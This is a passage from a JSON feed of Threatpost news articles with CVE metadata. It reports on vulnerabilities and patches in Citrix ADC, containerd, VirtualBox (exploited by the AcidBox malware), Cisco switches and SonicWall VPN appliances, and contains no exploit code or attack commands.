"CVE-2020-5135"], "modified": "2020-03-11T17:13:53", "id": "THREATPOST:0EAD358006302B8EB3637C22334E13DC", "href": "https://threatpost.com/wormable-unpatched-microsoft-bug/153632/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:31:10", "description": "About one in five of the 80,000 companies affected by a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway are still at risk from a trivial attack on their internal operations.\n\nIf exploited, the flaw could allow unauthenticated attackers to gain remote access to a company\u2019s local network and carry out arbitrary code-execution. Researchers told Threatpost that other attacks are also possible, including denial-of-service (DoS) campaigns, data theft, lateral infiltration to other parts of the corporate infrastructure, and phishing.\n\nAccording to an assessment from Positive Technologies, which disclosed the software vulnerability in December (tracked as [CVE-2019-19781](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>)), 19 percent of vulnerable organizations in 158 countries have yet to patch. The U.S. originally accounted for 38 percent of all vulnerable organizations; about 21 percent of those are still running vulnerable instances of the products as of this week, PT said.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe Citrix products (formerly the NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively.\n\n\u201cPatching this bug should be an urgent priority for all remaining companies affected,\u201d said Mikhail Klyuchnikov, an expert at PT who discovered the flaw, speaking to Threatpost. \u201cThe critical vulnerability allows attackers to obtain direct access to the company\u2019s local network from the internet. This attack does not require access to any accounts, and therefore can be performed by any external attacker.\u201d\n\nHe added, \u201cThe flaw is really easy to exploit. It\u2019s also very reliable.\u201d[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/02/07094404/PT_Citrix_NewMap-EN.jpg>)\n\nSince Citrix is mainly used for giving remote access to applications in companies\u2019 internal networks, Klyuchnikov told Threatpost that a compromise could easily used as a foothold to move laterally across a victim organization.\n\n\u201cThe critical information about applications accessible by Citrix can be leaked,\u201d he explained. \u201cThat could possibly include information (and possibly credentials) about internal web applications, corporate applications, remote desktops and other applications available through the Citrix Gateway.\u201d\n\nAttackers also could gain the ability to read configuration files, he said; these contain sensitive information like user credentials, yet more information about the internal network and credentials for internal services (LDAP, RADIUS and so on).\n\n\u201cDepending on system settings, attackers can get administrative credentials for the Citrix Gateway, credentials (login, password, etc.) of company employees and credentials of other services used in Citrix Gateway [from the configuration files],\u201d he said.\n\nAdding insult to injury, various other kinds of attacks are possible as well.\n\n\u201c[An attacker] can conduct DoS attacks against Citrix Gateway, just deleting its critical files,\u201d the researcher explained to Threatpost. \u201cIt can lead to unavailability of the login page of Citrix application. Thus, no one (e.g. company employees) can get access into internal network using Citrix gateway. In other words, the Citrix gateway application will cease to do its main task for which it was installed.\u201d\n\nIt\u2019s also possible to conduct phishing attacks. For example, a hacker can change the login page so that the entered username and password is obtained by the attacker as clear text.\n\nAnd then there\u2019s the remote code-execution danger: \u201cAn attacker can use a compromised application as part of a botnet or for cryptocurrency mining. And of course, it can place malicious files in this application,\u201d Klyuchnikov noted.\n\nIn-the-wild attacks could be imminent: On January 8, a researcher [released an exploit](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) that allows a potential attacker to perform automated attacks. Others followed.\n\nhttps://twitter.com/GossiTheDog/status/1214892555306971138\n\nCitrix did not disclose many details about the vulnerability [in its security advisory](<https://support.citrix.com/article/CTX267027>), however, Qualys researchers last month said that the mitigation steps offered by the vendor suggest the flaw stems from the VPN handler failing to sufficiently sanitize user-supplied inputs.\n\nAccording to PT, the countries with the greatest numbers of vulnerable companies are led by Brazil (43 percent of all companies where the vulnerability was originally detected), China (39 percent), Russia (35 percent), France (34 percent), Italy (33 percent) and Spain (25 percent). The USA, Great Britain, and Australia each stand at 21 percent of companies still using vulnerable devices without any protection measures.\n\nLast month, Citrix [issued patches](<https://support.citrix.com/article/CTX267027>) for several product versions to fix the issue, [ahead of schedule](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).\n\n\u201cConsidering how long this vulnerability has been around (since the first vulnerable version of the software was released in 2014), detecting potential exploitation of this vulnerability (and, therefore, infrastructure compromise) retrospectively becomes just as important [as patching],\u201d Klyuchnikov said.\n\nHe added, \u201cI think it\u2019s easy to apply the patch, as there is already a regular update for the hardware that fixes the vulnerability. Nothing should get in the way, as there is a full update from Citrix.\u201d\n\n**Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us **[**Wednesday, Feb. 19 at 2 p.m. ET**](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>)** when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives.**\n", "cvss3": {}, "published": "2020-02-07T15:32:52", "type": "threatpost", "title": "Critical Citrix RCE Flaw Still Threatens 1,000s of Corporate LANs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135"], "modified": "2020-02-07T15:32:52", "id": "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "href": "https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:25:54", "description": "Citrix has quickened its rollout of patches for a critical vulnerability ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) in the Citrix Application Delivery Controller (ADC) and Citrix Gateway products, on the heels of recent proof-of-concept exploits and skyrocketing exploitation attempts.\n\nSeveral versions of the products still remain unpatched \u2013 but they will be getting a patch sooner than they were slated to. While Citrix originally said some versions would get a patch Jan. 31, it has now also shortened that timeframe, saying fixes are forthcoming on Jan 24 (Friday of this week).\n\nAlso, Citrix patched Citrix ADC and Citrix Gateway version 11.1 (with firmware update Refresh Build 11.1.63.15) and 12 (firmware update Refresh Build 12.0.63.13) on Jan. 19 \u2014 a day earlier than it had expected to.\n\n[](<https://register.gotowebinar.com/register/7679724086205178371?source=art>)\n\nThe versions that Citrix expects to patch on Jan. 24 include Citrix ADC and Citrix Gateway version 10.5 (with Refresh Build 10.5.70.x), 12.1 (Refresh Build 12.1.55.x), 13 (Refresh Build 13.0.47.x), as well as Citrix SD-WAN WANOP Release 10.2.6 (with Citrix ADC Release 11.1.51.615) and Citrix SD-WAN WANOP Release 11.0.3 (Citrix ADC Release 11.1.51.615).\n\nWhen it was originally disclosed [in December](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>), the vulnerability did not have a patch, and Citrix [announced](<https://support.citrix.com/article/CTX267027>) it would not be issuing fixes for the gateway products and ADC (formerly called NetScaler ADC), a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web, until \u201clate January.\u201d\n\nHowever, in the following weeks after disclosure, various researchers published public [proof-of-concept (PoC) exploit code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) for the flaw. At the same time, [researchers warned of active exploitations](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>), and [mass scanning activity](<https://twitter.com/bad_packets/status/1217234838446460929>), for the vulnerable Citrix products.\n\n> CVE-2019-19781 mass scanning activity from these hosts is still ongoing. <https://t.co/pK4Qus1eAo>\n> \n> \u2014 Bad Packets Report (@bad_packets) [January 14, 2020](<https://twitter.com/bad_packets/status/1217234838446460929?ref_src=twsrc%5Etfw>)\n\nIn one unique case of exploitation, [researchers at FireEye said last week](<https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html>) that a threat actor was targeting vulnerable Citrix devices with a previously-unseen payload, which they coined as \u201cNOTROBIN.\u201d\n\nResearchers said that the attack group behind the payload appeared to be scanning for vulnerable ADC devices and deploying their own malware on the devices, which would then delete any previously-installed malware. Researchers suspect that the threat actors may be trying to maintain their own backdoor access in compromised devices.\n\n\u201cUpon gaining access to a vulnerable NetScaler [ADC] device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign,\u201d researchers said.\n\nWith patches now being available or soon to be rolled out, security experts urge customers to update as soon as possible.\n\n\u201cCISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP once the appropriate firmware updates become available,\u201d according to a Monday CISA alert on the patches. \u201cThe fixed builds can be downloaded from Citrix Downloads pages for [Citrix ADC](<https://www.citrix.com/downloads/citrix-adc/>) and [Citrix Gateway](<https://www.citrix.com/downloads/citrix-gateway/>). Until the appropriate update is accessible, users and administrators should apply Citrix\u2019s interim mitigation steps for CVE-2019-19781.\u201d\n\n**_Concerned about mobile security? _**[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) **_Top 8 Best Practices for Mobile App Security, on Jan. 22 at 2 p.m. ET. _**_**Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts from **_**_Secureworks and White Ops to discuss the secrets of building a secure mobile strategy, one app at a time. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)**_._**\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n", "cvss3": {}, "published": "2020-01-21T17:19:28", "type": "threatpost", "title": "Citrix Accelerates Patch Rollout For Critical RCE Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135"], "modified": "2020-01-21T17:19:28", "id": "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "href": "https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-26T18:29:40", "description": "A security vulnerability can be exploited to coerce the containerd cloud platform into exposing the host\u2019s registry or users\u2019 cloud-account credentials.\n\nContainerd [bills itself](<https://containerd.io/>) as a runtime tool that \u201cmanages the complete container lifecycle of its host system, from image transfer and storage to container execution and supervision to low-level storage to network attachments and beyond.\u201d As such, it offers deep visibility into a user\u2019s cloud environment, across multiple vendors.\n\nThe bug (CVE-2020-15157) is located in the container image-pulling process, according to Gal Singer, researcher at Aqua. Adversaries can exploit this vulnerability by building dedicated container images designed to steal the host\u2019s token, then using the token to take over a cloud project, he explained.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cA container image is a combination of a manifest file and some individual layer files,\u201d he wrote in a [recent post](<https://blog.aquasec.com/cve-2020-15157-containerd-container-vulnerability>). \u201cThe manifest file [in Image V2 Schema 2 format]\u2026can contain a \u2018foreign layer\u2019 which is pulled from a remote registry. When using containerd, if the remote registry responds with an HTTP 401 status code, along with specific HTTP headers, the host will send an authentication token that can be stolen.\u201d\n\nHe added, \u201cthe manifest supports an optional field for an external URL from which content may be fetched, and it can be any registry or domain.\u201d\n\nThe attackers can thus exploit the problem by crafting a malicious image in a remote registry, and then convincing the user to access it through containerd (this can be done through email and other social-engineering avenues), according to the [National Vulnerability Database writeup](<https://nvd.nist.gov/vuln/detail/CVE-2020-15157>).\n\n\u201cIf an attacker publishes a public image with a manifest that directs one of the layers to be fetched from a web server they control, and they trick a user or system into pulling the image, they can obtain the credentials used for pulling that image,\u201d according to the bug advisory. \u201cIn some cases, this may be the user\u2019s username and password for the registry. In other cases, this may be the credentials attached to the cloud virtual instance which can grant access to other cloud resources in the account.\u201d\n\n## **Non-Trivial Exploitation**\n\nResearcher Brad Geesaman at Darkbit, who did original research into the vulnerability (which he calls \u201cContainerDrip\u201d), put together a proof-of-concept (PoC) exploit for a related attack vector.\n\nOne of the hurdles for exploitation is the fact that containerd clients that pull images may be configured to authenticate to a remote registry in order to fetch private images, which would prevent it from accessing the malicious content. Instead, an attacker would need to place the tainted image into a remote registry that the user already authenticates to.\n\n\u201cThe question became: \u2018How do I get them to send their credentials to me [for remote-registry authentication]?'\u201d he said in [a posting](<https://darkbit.io/blog/cve-2020-15157-containerdrip>) earlier this month. \u201cAs it turns out, all you have to do is ask the right question.\u201d\n\nThe Google Kubernetes Engine (GKE) is a managed environment for running containerized applications, which can be integrated with containerd. When GKE clusters running COS_CONTAINERD and GKE 1.16 or below are given a deployment to run, a Basic Auth header shows up, which when base64 decoded, turns out to be the authentication token for the underlying Google Compute Engine, used to create virtual machines. This token is attached to the GKE cluster/nodepool.\n\n\u201cBy default in GKE, the [Google Cloud Platform] service account attached to the nodepool is the default compute service account and it is granted Project Editor,\u201d explained Geesaman.\n\nThat said, also by default, a function called GKE OAuth Scopes \u201cscopes down\u201d the available permissions of that token. Geesaman also found a workaround for that.\n\n\u201cIf the defaults were modified when creating the cluster to grant the [\u201cany\u201d] scope to the nodepool, this token would have no OAuth scope restrictions and would grant the full set of Project Editor IAM permissions in that GCP project,\u201d he explained.\n\nAnd from there, attackers can escalate privileges to \u201cProject Owner\u201d using a known attack vector [demonstrated at](<https://www.youtube.com/watch?v=Z-JFVJZ-HDA>) DEF CON 2020.\n\nHe added that the GKE path is one of many possible.\n\ncontainerd [patched](<https://github.com/containerd/containerd/releases/tag/v1.2.14>) the bug, which is listed as medium in severity, in version 1.2.4; containerd 1.3.x is not vulnerable.\n\nCloud security continues to be a challenge for organizations. Researchers earlier in October [disclosed two flaws](<https://threatpost.com/microsoft-azure-flaws-servers-takeover/159965/>) in Microsoft\u2019s Azure web hosting application service, App Services, which if exploited could enable an attacker to take over administrative servers. Over the summer, malware like the Doki backdoor was [found to be infesting](<https://threatpost.com/doki-backdoor-docker-servers-cloud/157871/>) Docker containers.\n\nIn April, a simple Docker container honeypot was [used in a lab test](<https://threatpost.com/poorly-secured-docker-image-rapid-attack/154874/>) to see just how quickly cybercriminals will move to compromise vulnerable cloud infrastructure. It was quickly attacked by four different criminal campaigns over the span of 24 hours.\n", "cvss3": {}, "published": "2020-10-26T17:12:13", "type": "threatpost", "title": "Containerd Bug Exposes Cloud Account Credentials", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-15157", "CVE-2020-5135"], "modified": "2020-10-26T17:12:13", "id": "THREATPOST:39625C47309704502299C3CF93814CFA", "href": "https://threatpost.com/containerd-bug-cloud-account-credentials/160546/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:23:47", "description": "Advanced malware, dubbed AcidBox, has been identified by researchers who say a mysterious cybergang used it twice against Russian organizations as far back as 2017. In a report released Wednesday, Palo Alto Networks\u2019 Unit 42 sheds new light onto attacks against the popular open-source virtualization software VirtualBox that used the AcidBox malware.\n\nUnit 42\u2019s postmortem on the VirtualBox attacks begins in 2008 when researchers at Core Security found a bug in the Windows Vista security mechanism called [Driver Signature Enforcement](<https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559\\(v=vs.85\\)?redirectedfrom=MSDN>) (DSE). The flaw allowed an attacker to disable DSE and install rogue software onto targeted instances of Oracle\u2019s VirtualBox software. The bug (CVE-2008-3431) impacting VirtualBox driver VBoxDrv.sys was patched in version 1.6.4.\n\nFast forward to 2o14, and the notorious Turla Group developed the first malware to abused a third-party device driver to disable DSE, weaponizing Core Security\u2019s research. The Turla Group attacks also focused on VirtualBox drivers. And despite Oracle\u2019s 2008 patch, Turla operators successfully figured out how to disabled DSE with its malware. That\u2019s because, according to Unit 42, despite the bug (CVE-2008-3431) fix, only one of two vulnerabilities were patched in 2008.\n\n\u201cThe exploit used by Turla actually abuses two vulnerabilities \u2014 of which, only one was ever fixed [with CVE-2008-3431],\u201d Unit 42 wrote in [its report posted](<https://unit42.paloaltonetworks.com/acidbox-rare-malware/>) Wednesday. The Turla Group malware, researchers said, also targeted a second DSE vulnerability tied to a signed VirtualBox driver (VBoxDrv.sys v1.6.2) using what would later be identified as AcidBox malware.[](<https://threatpost.com/newsletter-sign/>)\n\nFast forward to 2019, and that\u2019s when Unit 42 said it first discovered a sample of AcidBox that had been uploaded to VirusTotal. Researchers then traced the AcidBox malware to fresh attacks against the VirtualBox driver VBoxDrv.sys v1.6.2, along with all other versions up to v3.0.0 (the current VirtualBox version is 6).\n\n\u201cBecause of the malware\u2019s complexity, rarity, and the fact that it\u2019s part of a bigger toolset, we believe it was used by an advanced threat actor for targeted attacks and it\u2019s likely that this malware is still being used today if the attacker is still active,\u201d wrote Dominik Reichel and Esmid Idrizovic, researchers with Palo Alto Networks\u2019 Unit 42 team.\n\nDespite similarities between the Turla Group and the cybergang behind the recent VirtualBox attacks, researchers said the two threat groups are not linked. [Turla](<https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/>), also known as Venomous Bear, Waterbug and Uroboros, is a Russian-speaking threat actor known since 2014.\n\n## **VirtualBox Exploit**\n\nThe exploit that was used by Turla abuses two vulnerabilities. The first flaw ([CVE-2008-3431](<https://www.cvedetails.com/cve/CVE-2008-3431/>)), fixed in 2008, exists in the VBoxDrvNtDeviceControl function in VBoxDrv.sys. The function does not properly validate a buffer associated with the Irp object, allowing local users to gain privileges by opening the \\\\\\\\.\\VBoxDrv device and calling DeviceIoControl to send a crafted kernel address.\n\nHowever, the second vulnerability is still unpatched, and was used in a newer version of Turla\u2019s exploit, which researchers believe was introduced in 2014 in the threat group\u2019s kernelmode malware. It is this exploit that the yet-to-be-known threat actor behind AcidBox leveraged in the 2017 attack against the two Russian firms.\n\nReichel told Threatpost that the unpatched flaw \u201cnever got a CVE since it was naturally (i.e. unintentionally) patched in version 3.0.0.\u201d\n\n\u201c[AcidBox] uses a known VirtualBox exploit to disable Driver Signature Enforcement in Windows, but with a new twist: While it\u2019s publicly known that VirtualBox driver VBoxDrv.sys v1.6.2 is vulnerable and used by Turla, this new malware uses the same exploit but with a slightly newer VirtualBox version,\u201d said researchers.\n\n## **The Malware**\n\nThe AcidBox malware itself is a complex modular toolkit. Researchers only have access to a small part of this toolkit. They found four 64-bit usermode DLLs and an unsigned kernelmode driver. Three (out of those four usermode samples (msv1_0.dll, pku2u.dll, wdigest.dll) have identical functionality and are loaders for the main worker module, researchers said.\n\nResearchers also noted that attackers are using their own DEF files (instead of __declspec(dllexport), which adds the export directive to the object file so users do not need to use a DEF file) to give instructions for when to import or export its DLLs. A DEF file (or module-definition file) is a text file containing one or more module statements that describe various attributes of a DLL. When a DEF file is used, attackers can choose which ordinal their export function will have.\n\n\u201cThis is not possible with __declspec(dllexport) as the Visual Studio compiler always counts your functions starting from one,\u201d said researchers. \u201cUsing a DEF file instead of __declspec(dllexport) has some advantages. You are able to export functions by ordinals and you can also redirect functions among other things. The disadvantage is that you have to maintain an additional file within your project.\u201d\n\nReichel told Threatpost there\u2019s still a lot of unknowns about the malware, but he\u2019s \u201cencouraging the cybersecurity community to help collaborate with us and share any additional information about this threat if they have it,\u201d he said.\n\nMoving forward, AcidBox is a \u201cvery rare\u201d malware that is probably used in highly targeted attacks, researchers said.\n\n\u201cWhile AcidBox doesn\u2019t use any fundamentally new methods, it breaks the myth that only VirtualBox VBoxDrv.sys 1.6.2 can be used for Turla\u2019s exploit,\u201d they said. \u201cAppending sensitive data as an overlay in icon resources, abusing the SSP interface for persistence and injection and payload storage in the Windows registry puts it into the category of interesting malware.\u201d\n\n**_Insider threats are different in the work-from home era. On _**[**_June 24 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)**_, join the Threatpost edit team and our special guest, Gurucul CEO Saryu Nayyar, for a FREE webinar, \u201c_**_**The Enemy Within: How Insider Threats Are Changing.\u201d **_**_Get helpful, real-world information on how insider threats are changing with WFH, what the new attack vectors are and what companies can do about it_**_**. **_[**_Please register here_**](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)**_ for this Threatpost webinar._**\n", "cvss3": {}, "published": "2020-06-17T22:12:04", "type": "threatpost", "title": "AcidBox Malware Uncovered Using Repurposed VirtualBox Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2008-3431", "CVE-2020-5135"], "modified": "2020-06-17T22:12:04", "id": "THREATPOST:B9A8F6E46618F5253194C38A1808CF9C", "href": "https://threatpost.com/acidbox-malware-uncovered-using-repurposed-virtualbox-exploit/156653/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:17:24", "description": "Cisco Systems is warning of a high-severity flaw affecting more than a half-dozen of its small business switches. The flaw could allow remote, unauthenticated attackers to access the switches\u2019 management interfaces with administrative privileges.\n\nSpecifically affected are Series Smart Switches, Series Managed Switches and Series Stackable Managed Switches. Cisco said it was unaware of active exploitation of the vulnerabilities. Software updates remediating the flaws are available for some of the affected switches, however, others have reached end of life (EOL) and will not receive a patch.\n\nThe flaw (CVE-2020-3297), which ranks 8.1 out of 10.0 on the CVSS scale, stems from use of weak entropy generation for session identifier values, a Wednesday Cisco security advisory said.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cAn attacker could exploit this vulnerability to determine a current session identifier through brute force and reuse that session identifier to take over an ongoing session,\u201d according to [Cisco\u2019s advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sbswitch-session-JZAS5jnY>).\n\nIn this way, an attacker can defeat authentication protections for the devices and obtain the privileges of the highjacked session account. If the victim is an administrative user, the attacker could gain administrative privileges on the device.\n\nSpecifically affected by the issue are: Cisco 250 Series Smart Switches, 350 Series Managed Switches, 350X Series Stackable Managed Switches, 550X Series Stackable Managed Switches, Small Business 200 Series Smart Switches, Small Business 300 Series Managed Switches and Small Business 500 Series Stackable Managed Switches.\n\nCisco has fixed the issue in firmware release 2.5.5.47. This update will apply to the 250 Series Smart Switches, 350 Series Managed Switches, 350X Series Stackable Managed Switches, 550X Series Stackable Managed Switches.\n\nHowever, Cisco said, the Small Business 200 Series Smart Switches, Small Business 300 Series Managed Switches and Small Business 500 Series Stackable Managed Switches have passed the end-of-software-maintenance milestone.\n\n\u201cAlthough these switches are vulnerable, Cisco will not provide a firmware fix,\u201d said the company.\n\nCisco on Wednesday also released patches for a [slew of medium-severity flaws](<https://tools.cisco.com/security/center/publicationListing.x>), including ones in its small business RV042 and RV-042G routers, its Digital Network Architecture Center, its identity services engine, its Unified Customer Voice Portal, Unified Communications products and AnyConnect Security Mobility Client.\n\n[Earlier in June](<https://threatpost.com/cisco-webex-router-code-execution/156706/>), the networking giant also stomped out three high-severity flaws in its popular Webex web conferencing app, including one that could allow an unauthenticated attacker to remotely execute code on impacted systems.\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a _**[**_FREE webinar_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_, \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-07-01T21:02:00", "type": "threatpost", "title": "Cisco Warns of High-Severity Bug in Small Business Switch Lineup", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3297", "CVE-2020-5135"], "modified": "2020-07-01T21:02:00", "id": "THREATPOST:88ED6BF6458FC657DACB44E3795710C1", "href": "https://threatpost.com/cisco-warns-high-severity-bug-small-business-switch/157090/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-23T17:55:37", "description": "UPDATE\n\nAn October patch [for a critical remote code execution (RCE) bug in a SonicWall VPN](<https://threatpost.com/critical-sonicwall-vpn-bug/160108/>) appliance turned out to be insufficient. While the patch closed the RCE attack vector, more than 800,000 devices were still vulnerable to an additional memory-leak flaw for months, according to researchers.\n\nSonicWall originally patched the stack-based buffer overflow vulnerability in the SonicWall Network Security Appliance (NSA), tracked as [CVE-2020-5135](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010>), back in October.\n\nHowever, Craig Young, a computer security researcher with Tripwire\u2019s Vulnerability and Exposures Research Team (VERT), said the initial patch for the vulnerability was \u201cbotched,\u201d needing a \u201cone- or two-line fix\u201d to be complete, he wrote in a [report](<https://www.tripwire.com/state-of-security/featured/analyzing-sonicwalls-unsuccessful-fix-for-cve-2020-5135/>) published Tuesday, which details the specifics of where the fix went wrong.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability ([CVE-2021-20019](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0006>)), not addressed by the initial October patch, is described in a security bulletin published Tuesday as, \u201cA vulnerability in SonicOS where the HTTP server response leaks partial memory by sending a crafted unauthenticated HTTP request. This can potentially lead to an internal sensitive data disclosure vulnerability.\u201d\n\nIn a statement from SonicWall sent to Threatpost it stated:\n\n_\u201cSonicWall is active in collaborating with third-party researchers, security vendors and forensic analysis firms to ensure its products meet or exceed expected security standards. Through the course of this practice, SonicWall was made aware of, verified, tested and patched a non-critical buffer overflow vulnerability that impacted versions of SonicOS. SonicWall is not aware of this vulnerability being exploited in the wild. As always, SonicWall strongly encourages organizations maintain patch diligence for all security products.\u201d _\n\nThe initial bug, with a CVSS severity rating of 9.4. The vulnerability highlighted by Tripwire has a medium CVSS severity rating of 5.3.\n\nThough SonicWall was aware of the problem soon after the fix was released, it only released a complete patch this week, Young wrote.\n\n\u201cI had expected that a patch would probably come out quickly but, fast-forward to March and I still had not heard back,\u201d he wrote. \u201cI reconnected with their PSIRT [Product Security Incident Response Team] on March 1, 2021, for an update, but ultimately it took until well into June before an advisory could be released.\u201d\n\n## **Where It Went Wrong**\n\nYoung and Nikita Abramov, application analysis specialist at Positive Technologies (PT), were credited back in October with finding the flaw, which exists within the HTTP/HTTPS service used for product management and SSL VPN remote access.\n\nThe vulnerability could allow an unskilled attacker to trigger a persistent denial-of-service (DoS) condition using an unauthenticated HTTP request involving a custom protocol handler, as well as spread further damage, Young wrote in his [analysis](<https://www.tripwire.com/state-of-security/vert/sonicwall-vpn-portal-critical-flaw-cve-2020-5135/>) at the time.\n\nAbramov and Young both reported the bug to SonicWall around the same time in late September, and the company gave Young a date of Oct. 5 for a patch to resolve the problem. That date later was pushed up to Oct. 14, he said, which is when SonicWall also acknowledged to Threatpost that it had indeed issued a patch for the flaw.\n\nHowever, after the patch was released, Young tested a SonicWall VPN on Microsoft Azure to confirm how it responded to a proof-of-concept exploit he\u2019d devised for the flaw and found that it was still vulnerable. However, though it did not crash the system, the exploit payload did trigger a flood of binary data in response, he wrote, providing a screenshot of the result in his analysis.\n\n\u201cAs you can see from the screenshot, there are values in the binary data which certainly look like they could be memory addresses,\u201d Young wrote. \u201cAlthough I never observed recognizable text in the leaked memory, I believe this output could vary based on how the target system is used. I also suspect that the values in my output are in fact memory addresses which could be a useful information leak for exploiting an RCE bug.\u201d\n\nYoung\u2019s final assessment of his test was that the fix was incomplete, he said. \u201cThe unbounded string copy was replaced with an appropriate memory safe function, but the return value was not properly considered,\u201d he wrote.\n\n## **Delayed Security Advisory**\n\nYoung reported his findings to SonicWall PSIRT on Oct. 6 and followed up several times before receiving a response on Oct. 9 that \u201cconfirmed my expectation that this was the result of an improper fix for CVE-2020-5135, and told me that the patched firmware versions had already started to become available on mysonicwall.com as well as via Azure,\u201d he wrote.\n\nSix days later, Young said he received a response from the company that he would be informed when the memory-dump issue he identified was resolved and ready for release. He followed up again in March when he still had not heard back, he said.\n\nUltimately, it would take until this Wednesday, June 22, before SonicWall would publicly post [the advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010>) for the updated patch to the vulnerability, Young wrote.\n\nThe security advisory also patches a number of other bugs in SonicWall platforms, a complete list of which is available in both the company\u2019s post and Young\u2019s analysis.\n\n_(This article was updated on 6/23 at 12:30 p.m. ET to reflect additional reporting on a portion of a vulnerability not addressed by SonicWall\u2019s October patch. A clarification was also made to more clearly indicate that SonicWall\u2019s initial patch did mitigate the RCE bug. The article also includes a statement from SonicWall.) _\n\n**Join Threatpost for \u201c**[**Tips and Tactics for Better Threat Hunting**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)**\u201d \u2014 a LIVE event on **[**Wed., June 30 at 2:00 PM ET**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** in partnership with Palo Alto Networks. Learn from Palo Alto\u2019s Unit 42 experts the best way to hunt down threats and how to use automation to help. **[**Register HERE**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** for free!**\n", "cvss3": {}, "published": "2021-06-23T10:44:07", "type": "threatpost", "title": "SonicWall 'Botches' October Patch for VPN Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135", "CVE-2021-20019"], "modified": "2021-06-23T10:44:07", "id": "THREATPOST:70ADDCF33645E0424EA606C8912FDDCF", "href": "https://threatpost.com/sonicwall-botches-critical-vpn-bug/167152/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:21:30", "description": "A vulnerability in Google\u2019s Chromium-based browsers would allow attackers to bypass the Content Security Policy (CSP) on websites, in order to steal data and execute rogue 